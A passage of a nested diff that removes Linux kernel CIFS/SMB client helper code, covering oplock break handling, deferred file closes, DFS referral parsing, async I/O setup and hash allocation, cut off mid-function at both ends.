+-			/*   cifs_dump_mem("Rcvd notify Data: ",buf,
+-				sizeof(struct smb_hdr)+60); */
+-			return true;
+-		}
+-		if (pSMBr->hdr.Status.CifsError) {
+-			cifs_dbg(FYI, "notify err 0x%x\n",
+-				 pSMBr->hdr.Status.CifsError);
+-			return true;
+-		}
+-		return false;
+-	}
+-	if (pSMB->hdr.Command != SMB_COM_LOCKING_ANDX)
+-		return false;
+-	if (pSMB->hdr.Flags & SMBFLG_RESPONSE) {
+-		/* no sense logging error on invalid handle on oplock
+-		   break - harmless race between close request and oplock
+-		   break response is expected from time to time when writing out
+-		   large dirty files cached on the client */
+-		if ((NT_STATUS_INVALID_HANDLE) ==
+-		   le32_to_cpu(pSMB->hdr.Status.CifsError)) {
+-			cifs_dbg(FYI, "Invalid handle on oplock break\n");
+-			return true;
+-		} else if (ERRbadfid ==
+-		   le16_to_cpu(pSMB->hdr.Status.DosError.Error)) {
+-			return true;
+-		} else {
+-			return false; /* on valid oplock brk we get "request" */
+-		}
+-	}
+-	if (pSMB->hdr.WordCount != 8)
+-		return false;
+-
+-	cifs_dbg(FYI, "oplock type 0x%x level 0x%x\n",
+-		 pSMB->LockType, pSMB->OplockLevel);
+-	if (!(pSMB->LockType & LOCKING_ANDX_OPLOCK_RELEASE))
+-		return false;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(srv) ? srv->primary_server : srv;
+-
+-	/* look up tcon based on tid & uid */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			if (tcon->tid != buf->Tid)
+-				continue;
+-
+-			cifs_stats_inc(&tcon->stats.cifs_stats.num_oplock_brks);
+-			spin_lock(&tcon->open_file_lock);
+-			list_for_each_entry(netfile, &tcon->openFileList, tlist) {
+-				if (pSMB->Fid != netfile->fid.netfid)
+-					continue;
+-
+-				cifs_dbg(FYI, "file id match, oplock break\n");
+-				pCifsInode = CIFS_I(d_inode(netfile->dentry));
+-
+-				set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK,
+-					&pCifsInode->flags);
+-
+-				netfile->oplock_epoch = 0;
+-				netfile->oplock_level = pSMB->OplockLevel;
+-				netfile->oplock_break_cancelled = false;
+-				cifs_queue_oplock_break(netfile);
+-
+-				spin_unlock(&tcon->open_file_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				return true;
+-			}
+-			spin_unlock(&tcon->open_file_lock);
+-			spin_unlock(&cifs_tcp_ses_lock);
+-			cifs_dbg(FYI, "No matching file for oplock break\n");
+-			return true;
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	cifs_dbg(FYI, "Can not process oplock break for non-existent connection\n");
+-	return true;
+-}
+-
+-void
+-dump_smb(void *buf, int smb_buf_length)
+-{
+-	if (traceSMB == 0)
+-		return;
+-
+-	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_NONE, 8, 2, buf,
+-		       smb_buf_length, true);
+-}
+-
+-void
+-cifs_autodisable_serverino(struct cifs_sb_info *cifs_sb)
+-{
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
+-		struct cifs_tcon *tcon = NULL;
+-
+-		if (cifs_sb->master_tlink)
+-			tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
+-		cifs_sb->mnt_cifs_serverino_autodisabled = true;
+-		cifs_dbg(VFS, "Autodisabling the use of server inode numbers on %s\n",
+-			 tcon ? tcon->tree_name : "new server");
+-		cifs_dbg(VFS, "The server doesn't seem to support them properly or the files might be on different servers (DFS)\n");
+-		cifs_dbg(VFS, "Hardlinks will not be recognized on this mount. Consider mounting with the \"noserverino\" option to silence this message.\n");
+-
+-	}
+-}
+-
+-void cifs_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock)
+-{
+-	oplock &= 0xF;
+-
+-	if (oplock == OPLOCK_EXCLUSIVE) {
+-		cinode->oplock = CIFS_CACHE_WRITE_FLG | CIFS_CACHE_READ_FLG;
+-		cifs_dbg(FYI, "Exclusive Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else if (oplock == OPLOCK_READ) {
+-		cinode->oplock = CIFS_CACHE_READ_FLG;
+-		cifs_dbg(FYI, "Level II Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else
+-		cinode->oplock = 0;
+-}
+-
+-/*
+- * We wait for oplock breaks to be processed before we attempt to perform
+- * writes.
+- */
+-int cifs_get_writer(struct cifsInodeInfo *cinode)
+-{
+-	int rc;
+-
+-start:
+-	rc = wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_OPLOCK_BREAK,
+-			 TASK_KILLABLE);
+-	if (rc)
+-		return rc;
+-
+-	spin_lock(&cinode->writers_lock);
+-	if (!cinode->writers)
+-		set_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
+-	cinode->writers++;
+-	/* Check to see if we have started servicing an oplock break */
+-	if (test_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags)) {
+-		cinode->writers--;
+-		if (cinode->writers == 0) {
+-			clear_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
+-			wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS);
+-		}
+-		spin_unlock(&cinode->writers_lock);
+-		goto start;
+-	}
+-	spin_unlock(&cinode->writers_lock);
+-	return 0;
+-}
+-
+-void cifs_put_writer(struct cifsInodeInfo *cinode)
+-{
+-	spin_lock(&cinode->writers_lock);
+-	cinode->writers--;
+-	if (cinode->writers == 0) {
+-		clear_bit(CIFS_INODE_PENDING_WRITERS, &cinode->flags);
+-		wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS);
+-	}
+-	spin_unlock(&cinode->writers_lock);
+-}
+-
+-/**
+- * cifs_queue_oplock_break - queue the oplock break handler for cfile
+- * @cfile: The file to break the oplock on
+- *
+- * This function is called from the demultiplex thread when it
+- * receives an oplock break for @cfile.
+- *
+- * Assumes the tcon->open_file_lock is held.
+- * Assumes cfile->file_info_lock is NOT held.
+- */
+-void cifs_queue_oplock_break(struct cifsFileInfo *cfile)
+-{
+-	/*
+-	 * Bump the handle refcount now while we hold the
+-	 * open_file_lock to ensure it remains valid for the oplock
+-	 * break handler. The matching put is done at the end of the
+-	 * handler.
+-	 */
+-	cifsFileInfo_get(cfile);
+-
+-	queue_work(cifsoplockd_wq, &cfile->oplock_break);
+-}
+-
+-void cifs_done_oplock_break(struct cifsInodeInfo *cinode)
+-{
+-	clear_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags);
+-	wake_up_bit(&cinode->flags, CIFS_INODE_PENDING_OPLOCK_BREAK);
+-}
+-
+-bool
+-backup_cred(struct cifs_sb_info *cifs_sb)
+-{
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPUID) {
+-		if (uid_eq(cifs_sb->ctx->backupuid, current_fsuid()))
+-			return true;
+-	}
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPGID) {
+-		if (in_group_p(cifs_sb->ctx->backupgid))
+-			return true;
+-	}
+-
+-	return false;
+-}
+-
+-void
+-cifs_del_pending_open(struct cifs_pending_open *open)
+-{
+-	spin_lock(&tlink_tcon(open->tlink)->open_file_lock);
+-	list_del(&open->olist);
+-	spin_unlock(&tlink_tcon(open->tlink)->open_file_lock);
+-}
+-
+-void
+-cifs_add_pending_open_locked(struct cifs_fid *fid, struct tcon_link *tlink,
+-			     struct cifs_pending_open *open)
+-{
+-	memcpy(open->lease_key, fid->lease_key, SMB2_LEASE_KEY_SIZE);
+-	open->oplock = CIFS_OPLOCK_NO_CHANGE;
+-	open->tlink = tlink;
+-	fid->pending_open = open;
+-	list_add_tail(&open->olist, &tlink_tcon(tlink)->pending_opens);
+-}
+-
+-void
+-cifs_add_pending_open(struct cifs_fid *fid, struct tcon_link *tlink,
+-		      struct cifs_pending_open *open)
+-{
+-	spin_lock(&tlink_tcon(tlink)->open_file_lock);
+-	cifs_add_pending_open_locked(fid, tlink, open);
+-	spin_unlock(&tlink_tcon(open->tlink)->open_file_lock);
+-}
+-
+-/*
+- * Critical section which runs after acquiring deferred_lock.
+- * As there is no reference count on cifs_deferred_close, pdclose
+- * should not be used outside deferred_lock.
+- */
+-bool
+-cifs_is_deferred_close(struct cifsFileInfo *cfile, struct cifs_deferred_close **pdclose)
+-{
+-	struct cifs_deferred_close *dclose;
+-
+-	list_for_each_entry(dclose, &CIFS_I(d_inode(cfile->dentry))->deferred_closes, dlist) {
+-		if ((dclose->netfid == cfile->fid.netfid) &&
+-			(dclose->persistent_fid == cfile->fid.persistent_fid) &&
+-			(dclose->volatile_fid == cfile->fid.volatile_fid)) {
+-			*pdclose = dclose;
+-			return true;
+-		}
+-	}
+-	return false;
+-}
+-
+-/*
+- * Critical section which runs after acquiring deferred_lock.
+- */
+-void
+-cifs_add_deferred_close(struct cifsFileInfo *cfile, struct cifs_deferred_close *dclose)
+-{
+-	bool is_deferred = false;
+-	struct cifs_deferred_close *pdclose;
+-
+-	is_deferred = cifs_is_deferred_close(cfile, &pdclose);
+-	if (is_deferred) {
+-		kfree(dclose);
+-		return;
+-	}
+-
+-	dclose->tlink = cfile->tlink;
+-	dclose->netfid = cfile->fid.netfid;
+-	dclose->persistent_fid = cfile->fid.persistent_fid;
+-	dclose->volatile_fid = cfile->fid.volatile_fid;
+-	list_add_tail(&dclose->dlist, &CIFS_I(d_inode(cfile->dentry))->deferred_closes);
+-}
+-
+-/*
+- * Critical section which runs after acquiring deferred_lock.
+- */
+-void
+-cifs_del_deferred_close(struct cifsFileInfo *cfile)
+-{
+-	bool is_deferred = false;
+-	struct cifs_deferred_close *dclose;
+-
+-	is_deferred = cifs_is_deferred_close(cfile, &dclose);
+-	if (!is_deferred)
+-		return;
+-	list_del(&dclose->dlist);
+-	kfree(dclose);
+-}
+-
+-void
+-cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+-{
+-	struct cifsFileInfo *cfile = NULL;
+-	struct file_list *tmp_list, *tmp_next_list;
+-	struct list_head file_head;
+-
+-	if (cifs_inode == NULL)
+-		return;
+-
+-	INIT_LIST_HEAD(&file_head);
+-	spin_lock(&cifs_inode->open_file_lock);
+-	list_for_each_entry(cfile, &cifs_inode->openFileList, flist) {
+-		if (delayed_work_pending(&cfile->deferred)) {
+-			if (cancel_delayed_work(&cfile->deferred)) {
+-				spin_lock(&cifs_inode->deferred_lock);
+-				cifs_del_deferred_close(cfile);
+-				spin_unlock(&cifs_inode->deferred_lock);
+-
+-				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+-				if (tmp_list == NULL)
+-					break;
+-				tmp_list->cfile = cfile;
+-				list_add_tail(&tmp_list->list, &file_head);
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_inode->open_file_lock);
+-
+-	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, false, false);
+-		list_del(&tmp_list->list);
+-		kfree(tmp_list);
+-	}
+-}
+-
+-void
+-cifs_close_all_deferred_files(struct cifs_tcon *tcon)
+-{
+-	struct cifsFileInfo *cfile;
+-	struct file_list *tmp_list, *tmp_next_list;
+-	struct list_head file_head;
+-
+-	INIT_LIST_HEAD(&file_head);
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		if (delayed_work_pending(&cfile->deferred)) {
+-			if (cancel_delayed_work(&cfile->deferred)) {
+-				spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-				cifs_del_deferred_close(cfile);
+-				spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-
+-				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+-				if (tmp_list == NULL)
+-					break;
+-				tmp_list->cfile = cfile;
+-				list_add_tail(&tmp_list->list, &file_head);
+-			}
+-		}
+-	}
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, true, false);
+-		list_del(&tmp_list->list);
+-		kfree(tmp_list);
+-	}
+-}
+-void
+-cifs_close_deferred_file_under_dentry(struct cifs_tcon *tcon, const char *path)
+-{
+-	struct cifsFileInfo *cfile;
+-	struct file_list *tmp_list, *tmp_next_list;
+-	struct list_head file_head;
+-	void *page;
+-	const char *full_path;
+-
+-	INIT_LIST_HEAD(&file_head);
+-	page = alloc_dentry_path();
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		full_path = build_path_from_dentry(cfile->dentry, page);
+-		if (strstr(full_path, path)) {
+-			if (delayed_work_pending(&cfile->deferred)) {
+-				if (cancel_delayed_work(&cfile->deferred)) {
+-					spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-					cifs_del_deferred_close(cfile);
+-					spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-
+-					tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+-					if (tmp_list == NULL)
+-						break;
+-					tmp_list->cfile = cfile;
+-					list_add_tail(&tmp_list->list, &file_head);
+-				}
+-			}
+-		}
+-	}
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, true, false);
+-		list_del(&tmp_list->list);
+-		kfree(tmp_list);
+-	}
+-	free_dentry_path(page);
+-}
+-
+-/* parses DFS referral V3 structure
+- * caller is responsible for freeing target_nodes
+- * returns:
+- * - on success - 0
+- * - on failure - errno
+- */
+-int
+-parse_dfs_referrals(struct get_dfs_referral_rsp *rsp, u32 rsp_size,
+-		    unsigned int *num_of_nodes,
+-		    struct dfs_info3_param **target_nodes,
+-		    const struct nls_table *nls_codepage, int remap,
+-		    const char *searchName, bool is_unicode)
+-{
+-	int i, rc = 0;
+-	char *data_end;
+-	struct dfs_referral_level_3 *ref;
+-
+-	*num_of_nodes = le16_to_cpu(rsp->NumberOfReferrals);
+-
+-	if (*num_of_nodes < 1) {
+-		cifs_dbg(VFS, "num_referrals: must be at least > 0, but we get num_referrals = %d\n",
+-			 *num_of_nodes);
+-		rc = -EINVAL;
+-		goto parse_DFS_referrals_exit;
+-	}
+-
+-	ref = (struct dfs_referral_level_3 *) &(rsp->referrals);
+-	if (ref->VersionNumber != cpu_to_le16(3)) {
+-		cifs_dbg(VFS, "Referrals of V%d version are not supported, should be V3\n",
+-			 le16_to_cpu(ref->VersionNumber));
+-		rc = -EINVAL;
+-		goto parse_DFS_referrals_exit;
+-	}
+-
+-	/* get the upper boundary of the resp buffer */
+-	data_end = (char *)rsp + rsp_size;
+-
+-	cifs_dbg(FYI, "num_referrals: %d dfs flags: 0x%x ...\n",
+-		 *num_of_nodes, le32_to_cpu(rsp->DFSFlags));
+-
+-	*target_nodes = kcalloc(*num_of_nodes, sizeof(struct dfs_info3_param),
+-				GFP_KERNEL);
+-	if (*target_nodes == NULL) {
+-		rc = -ENOMEM;
+-		goto parse_DFS_referrals_exit;
+-	}
+-
+-	/* collect necessary data from referrals */
+-	for (i = 0; i < *num_of_nodes; i++) {
+-		char *temp;
+-		int max_len;
+-		struct dfs_info3_param *node = (*target_nodes)+i;
+-
+-		node->flags = le32_to_cpu(rsp->DFSFlags);
+-		if (is_unicode) {
+-			__le16 *tmp = kmalloc(strlen(searchName)*2 + 2,
+-						GFP_KERNEL);
+-			if (tmp == NULL) {
+-				rc = -ENOMEM;
+-				goto parse_DFS_referrals_exit;
+-			}
+-			cifsConvertToUTF16((__le16 *) tmp, searchName,
+-					   PATH_MAX, nls_codepage, remap);
+-			node->path_consumed = cifs_utf16_bytes(tmp,
+-					le16_to_cpu(rsp->PathConsumed),
+-					nls_codepage);
+-			kfree(tmp);
+-		} else
+-			node->path_consumed = le16_to_cpu(rsp->PathConsumed);
+-
+-		node->server_type = le16_to_cpu(ref->ServerType);
+-		node->ref_flag = le16_to_cpu(ref->ReferralEntryFlags);
+-
+-		/* copy DfsPath */
+-		temp = (char *)ref + le16_to_cpu(ref->DfsPathOffset);
+-		max_len = data_end - temp;
+-		node->path_name = cifs_strndup_from_utf16(temp, max_len,
+-						is_unicode, nls_codepage);
+-		if (!node->path_name) {
+-			rc = -ENOMEM;
+-			goto parse_DFS_referrals_exit;
+-		}
+-
+-		/* copy link target UNC */
+-		temp = (char *)ref + le16_to_cpu(ref->NetworkAddressOffset);
+-		max_len = data_end - temp;
+-		node->node_name = cifs_strndup_from_utf16(temp, max_len,
+-						is_unicode, nls_codepage);
+-		if (!node->node_name) {
+-			rc = -ENOMEM;
+-			goto parse_DFS_referrals_exit;
+-		}
+-
+-		node->ttl = le32_to_cpu(ref->TimeToLive);
+-
+-		ref++;
+-	}
+-
+-parse_DFS_referrals_exit:
+-	if (rc) {
+-		free_dfs_info_array(*target_nodes, *num_of_nodes);
+-		*target_nodes = NULL;
+-		*num_of_nodes = 0;
+-	}
+-	return rc;
+-}
+-
+-struct cifs_aio_ctx *
+-cifs_aio_ctx_alloc(void)
+-{
+-	struct cifs_aio_ctx *ctx;
+-
+-	/*
+-	 * Must use kzalloc to initialize ctx->bv to NULL and ctx->direct_io
+-	 * to false so that we know when we have to unreference pages within
+-	 * cifs_aio_ctx_release()
+-	 */
+-	ctx = kzalloc(sizeof(struct cifs_aio_ctx), GFP_KERNEL);
+-	if (!ctx)
+-		return NULL;
+-
+-	INIT_LIST_HEAD(&ctx->list);
+-	mutex_init(&ctx->aio_mutex);
+-	init_completion(&ctx->done);
+-	kref_init(&ctx->refcount);
+-	return ctx;
+-}
+-
+-void
+-cifs_aio_ctx_release(struct kref *refcount)
+-{
+-	struct cifs_aio_ctx *ctx = container_of(refcount,
+-					struct cifs_aio_ctx, refcount);
+-
+-	cifsFileInfo_put(ctx->cfile);
+-
+-	/*
+-	 * ctx->bv is only set if setup_aio_ctx_iter() was called successfully,
+-	 * which means that iov_iter_get_pages() was a success and thus that
+-	 * we have taken reference on pages.
+-	 */
+-	if (ctx->bv) {
+-		unsigned i;
+-
+-		for (i = 0; i < ctx->npages; i++) {
+-			if (ctx->should_dirty)
+-				set_page_dirty(ctx->bv[i].bv_page);
+-			put_page(ctx->bv[i].bv_page);
+-		}
+-		kvfree(ctx->bv);
+-	}
+-
+-	kfree(ctx);
+-}
+-
+-#define CIFS_AIO_KMALLOC_LIMIT (1024 * 1024)
+-
+-int
+-setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw)
+-{
+-	ssize_t rc;
+-	unsigned int cur_npages;
+-	unsigned int npages = 0;
+-	unsigned int i;
+-	size_t len;
+-	size_t count = iov_iter_count(iter);
+-	unsigned int saved_len;
+-	size_t start;
+-	unsigned int max_pages = iov_iter_npages(iter, INT_MAX);
+-	struct page **pages = NULL;
+-	struct bio_vec *bv = NULL;
+-
+-	if (iov_iter_is_kvec(iter)) {
+-		memcpy(&ctx->iter, iter, sizeof(*iter));
+-		ctx->len = count;
+-		iov_iter_advance(iter, count);
+-		return 0;
+-	}
+-
+-	if (array_size(max_pages, sizeof(*bv)) <= CIFS_AIO_KMALLOC_LIMIT)
+-		bv = kmalloc_array(max_pages, sizeof(*bv), GFP_KERNEL);
+-
+-	if (!bv) {
+-		bv = vmalloc(array_size(max_pages, sizeof(*bv)));
+-		if (!bv)
+-			return -ENOMEM;
+-	}
+-
+-	if (array_size(max_pages, sizeof(*pages)) <= CIFS_AIO_KMALLOC_LIMIT)
+-		pages = kmalloc_array(max_pages, sizeof(*pages), GFP_KERNEL);
+-
+-	if (!pages) {
+-		pages = vmalloc(array_size(max_pages, sizeof(*pages)));
+-		if (!pages) {
+-			kvfree(bv);
+-			return -ENOMEM;
+-		}
+-	}
+-
+-	saved_len = count;
+-
+-	while (count && npages < max_pages) {
+-		rc = iov_iter_get_pages2(iter, pages, count, max_pages, &start);
+-		if (rc < 0) {
+-			cifs_dbg(VFS, "Couldn't get user pages (rc=%zd)\n", rc);
+-			break;
+-		}
+-
+-		if (rc > count) {
+-			cifs_dbg(VFS, "get pages rc=%zd more than %zu\n", rc,
+-				 count);
+-			break;
+-		}
+-
+-		count -= rc;
+-		rc += start;
+-		cur_npages = DIV_ROUND_UP(rc, PAGE_SIZE);
+-
+-		if (npages + cur_npages > max_pages) {
+-			cifs_dbg(VFS, "out of vec array capacity (%u vs %u)\n",
+-				 npages + cur_npages, max_pages);
+-			break;
+-		}
+-
+-		for (i = 0; i < cur_npages; i++) {
+-			len = rc > PAGE_SIZE ? PAGE_SIZE : rc;
+-			bv[npages + i].bv_page = pages[i];
+-			bv[npages + i].bv_offset = start;
+-			bv[npages + i].bv_len = len - start;
+-			rc -= len;
+-			start = 0;
+-		}
+-
+-		npages += cur_npages;
+-	}
+-
+-	kvfree(pages);
+-	ctx->bv = bv;
+-	ctx->len = saved_len - count;
+-	ctx->npages = npages;
+-	iov_iter_bvec(&ctx->iter, rw, ctx->bv, npages, ctx->len);
+-	return 0;
+-}
+-
+-/**
+- * cifs_alloc_hash - allocate hash and hash context together
+- * @name: The name of the crypto hash algo
+- * @sdesc: SHASH descriptor where to put the pointer to the hash TFM
+- *
+- * The caller has to make sure @sdesc is initialized to either NULL or
+- * a valid context. It can be freed via cifs_free_hash().
+- */
+-int
+-cifs_alloc_hash(const char *name, struct shash_desc **sdesc)
+-{
+-	int rc = 0;
+-	struct crypto_shash *alg = NULL;
+-
+-	if (*sdesc)
+-		return 0;
+-
+-	alg = crypto_alloc_shash(name, 0, 0);
+-	if (IS_ERR(alg)) {
+-		cifs_dbg(VFS, "Could not allocate shash TFM '%s'\n", name);
+-		rc = PTR_ERR(alg);
+-		*sdesc = NULL;
+-		return rc;
+-	}
+-
+-	*sdesc = kmalloc(sizeof(struct shash_desc) + crypto_shash_descsize(alg), GFP_KERNEL);
+-	if (*sdesc == NULL) {
+-		cifs_dbg(VFS, "no memory left to allocate shash TFM '%s'\n", name);
+-		crypto_free_shash(alg);
+-		return -ENOMEM;
+-	}
+-
+-	(*sdesc)->tfm = alg;
+-	return 0;
+-}
+-
+-/**
+- * cifs_free_hash - free hash and hash context together
+- * @sdesc: Where to find the pointer to the hash TFM
+- *
+- * Freeing a NULL descriptor is safe.
+- */
+-void
+-cifs_free_hash(struct shash_desc **sdesc)
+-{
+-	if (unlikely(!sdesc) || !*sdesc)
+-		return;
+-
+-	if ((*sdesc)->tfm) {
+-		crypto_free_shash((*sdesc)->tfm);
+-		(*sdesc)->tfm = NULL;
+-	}
+-
+-	kfree_sensitive(*sdesc);
+-	*sdesc = NULL;
+-}
+-
+-/**
+- * rqst_page_get_length - obtain the length and offset for a page in smb_rqst
+- * @rqst: The request descriptor
+- * @page: The index of the page to query
+- * @len: Where to store the length for this page
+- * @offset: Where to store the offset for this page
+- */
+-void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
+-			  unsigned int *len, unsigned int *offset)
+-{
+-	*len = rqst->rq_pagesz;
+-	*offset = (page == 0) ? rqst->rq_offset : 0;
+-
+-	if (rqst->rq_npages == 1 || page == rqst->rq_npages-1)
+-		*len = rqst->rq_tailsz;
+-	else if (page == 0)
+-		*len = rqst->rq_pagesz - rqst->rq_offset;
+-}
+-
+-void extract_unc_hostname(const char *unc, const char **h, size_t *len)
+-{
+-	const char *end;
+-
+-	/* skip initial slashes */
+-	while (*unc && (*unc == '\\' || *unc == '/'))
+-		unc++;
+-
+-	end = unc;
+-
+-	while (*end && !(*end == '\\' || *end == '/'))
+-		end++;
+-
+-	*h = unc;
+-	*len = end - unc;
+-}
+-
+-/**
+- * copy_path_name - copy src path to dst, possibly truncating
+- * @dst: The destination buffer
+- * @src: The source name
+- *
+- * returns number of bytes written (including trailing nul)
+- */
+-int copy_path_name(char *dst, const char *src)
+-{
+-	int name_len;
+-
+-	/*
+-	 * PATH_MAX includes nul, so if strlen(src) >= PATH_MAX it
+-	 * will truncate and strlen(dst) will be PATH_MAX-1
+-	 */
+-	name_len = strscpy(dst, src, PATH_MAX);
+-	if (WARN_ON_ONCE(name_len < 0))
+-		name_len = PATH_MAX-1;
+-
+-	/* we count the trailing nul */
+-	name_len++;
+-	return name_len;
+-}
+-
+-struct super_cb_data {
+-	void *data;
+-	struct super_block *sb;
+-};
+-
+-static void tcp_super_cb(struct super_block *sb, void *arg)
+-{
+-	struct super_cb_data *sd = arg;
+-	struct TCP_Server_Info *server = sd->data;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-
+-	if (sd->sb)
+-		return;
+-
+-	cifs_sb = CIFS_SB(sb);
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-	if (tcon->ses->server == server)
+-		sd->sb = sb;
+-}
+-
+-static struct super_block *__cifs_get_super(void (*f)(struct super_block *, void *),
+-					    void *data)
+-{
+-	struct super_cb_data sd = {
+-		.data = data,
+-		.sb = NULL,
+-	};
+-	struct file_system_type **fs_type = (struct file_system_type *[]) {
+-		&cifs_fs_type, &smb3_fs_type, NULL,
+-	};
+-
+-	for (; *fs_type; fs_type++) {
+-		iterate_supers_type(*fs_type, f, &sd);
+-		if (sd.sb) {
+-			/*
+-			 * Grab an active reference in order to prevent automounts (DFS links)
+-			 * from expiring and then freeing up our cifs superblock pointer while
+-			 * we're doing failover.
+-			 */
+-			cifs_sb_active(sd.sb);
+-			return sd.sb;
+-		}
+-	}
+-	return ERR_PTR(-EINVAL);
+-}
+-
+-static void __cifs_put_super(struct super_block *sb)
+-{
+-	if (!IS_ERR_OR_NULL(sb))
+-		cifs_sb_deactive(sb);
+-}
+-
+-struct super_block *cifs_get_tcp_super(struct TCP_Server_Info *server)
+-{
+-	return __cifs_get_super(tcp_super_cb, server);
+-}
+-
+-void cifs_put_tcp_super(struct super_block *sb)
+-{
+-	__cifs_put_super(sb);
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-int match_target_ip(struct TCP_Server_Info *server,
+-		    const char *share, size_t share_len,
+-		    bool *result)
+-{
+-	int rc;
+-	char *target, *tip = NULL;
+-	struct sockaddr tipaddr;
+-
+-	*result = false;
+-
+-	target = kzalloc(share_len + 3, GFP_KERNEL);
+-	if (!target) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	scnprintf(target, share_len + 3, "\\\\%.*s", (int)share_len, share);
+-
+-	cifs_dbg(FYI, "%s: target name: %s\n", __func__, target + 2);
+-
+-	rc = dns_resolve_server_name_to_ip(target, &tip, NULL);
+-	if (rc < 0)
+-		goto out;
+-
+-	cifs_dbg(FYI, "%s: target ip: %s\n", __func__, tip);
+-
+-	if (!cifs_convert_address(&tipaddr, tip, strlen(tip))) {
+-		cifs_dbg(VFS, "%s: failed to convert target ip address\n",
+-			 __func__);
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	*result = cifs_match_ipaddr((struct sockaddr *)&server->dstaddr,
+-				    &tipaddr);
+-	cifs_dbg(FYI, "%s: ip addresses match: %u\n", __func__, *result);
+-	rc = 0;
+-
+-out:
+-	kfree(target);
+-	kfree(tip);
+-
+-	return rc;
+-}
+-
+-int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+-{
+-	kfree(cifs_sb->prepath);
+-
+-	if (prefix && *prefix) {
+-		cifs_sb->prepath = cifs_sanitize_prepath(prefix, GFP_ATOMIC);
+-		if (!cifs_sb->prepath)
+-			return -ENOMEM;
+-
+-		convert_delimiter(cifs_sb->prepath, CIFS_DIR_SEP(cifs_sb));
+-	} else
+-		cifs_sb->prepath = NULL;
+-
+-	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-	return 0;
+-}
+-
+-/*
+- * Handle weird Windows SMB server behaviour. It responds with
+- * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request for
+- * "\<server>\<dfsname>\<linkpath>" DFS reference, where <dfsname> contains
+- * non-ASCII unicode symbols.
+- */
+-int cifs_inval_name_dfs_link_error(const unsigned int xid,
+-				   struct cifs_tcon *tcon,
+-				   struct cifs_sb_info *cifs_sb,
+-				   const char *full_path,
+-				   bool *islink)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	size_t len;
+-	char *path;
+-	char *ref_path;
+-
+-	*islink = false;
+-
+-	/*
+-	 * Fast path - skip check when @full_path doesn't have a prefix path to
+-	 * look up or tcon is not DFS.
+-	 */
+-	if (strlen(full_path) < 2 || !cifs_sb ||
+-	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
+-	    !is_tcon_dfs(tcon) || !ses->server->origin_fullpath)
+-		return 0;
+-
+-	/*
+-	 * Slow path - tcon is DFS and @full_path has prefix path, so attempt
+-	 * to get a referral to figure out whether it is a DFS link.
+-	 */
+-	len = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1) + strlen(full_path) + 1;
+-	path = kmalloc(len, GFP_KERNEL);
+-	if (!path)
+-		return -ENOMEM;
+-
+-	scnprintf(path, len, "%s%s", tcon->tree_name, full_path);
+-	ref_path = dfs_cache_canonical_path(path + 1, cifs_sb->local_nls,
+-					    cifs_remap(cifs_sb));
+-	kfree(path);
+-
+-	if (IS_ERR(ref_path)) {
+-		if (PTR_ERR(ref_path) != -EINVAL)
+-			return PTR_ERR(ref_path);
+-	} else {
+-		struct dfs_info3_param *refs = NULL;
+-		int num_refs = 0;
+-
